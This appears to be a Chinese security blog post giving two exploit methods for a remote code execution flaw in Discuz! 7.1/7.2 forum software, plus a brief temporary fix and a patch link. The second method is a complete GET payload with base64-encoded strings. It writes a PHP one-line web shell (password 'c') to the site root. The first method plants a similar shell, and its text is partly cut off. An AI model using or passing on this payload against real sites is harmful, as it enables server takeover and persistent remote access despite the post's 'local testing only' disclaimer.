 

discuz!7.1、7.2 远程代码执行漏洞exp_漏洞分析_网络安全_

2024-03-23 16:12:57 浏览量(5)

第一种方法：

先注册个用户然后把

chr解码后是：value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'');

里面有个提交地址改下，保存html

打开点提交，会生产forumdata/cache/usergroup_01.php一句话文件，密码是cmd

第二种方法：

直接GET，利用语句：

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法：

在common.inc.php上面加上
$response=$scriptlang=array();

官方发布修补补丁：
http://www.discuz.net/thread-1537673-1-1.html

注：使用exp的话仅限本机测试，其他用途后果自负！

【声明】：本博客不参与任何交易，也非中介，仅记录个人感兴趣的主机测评结果和优惠活动，内容均不作直接、间接、法定、约定的保证。访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客，即表示您已经知晓并接受了此声明通告。

分享到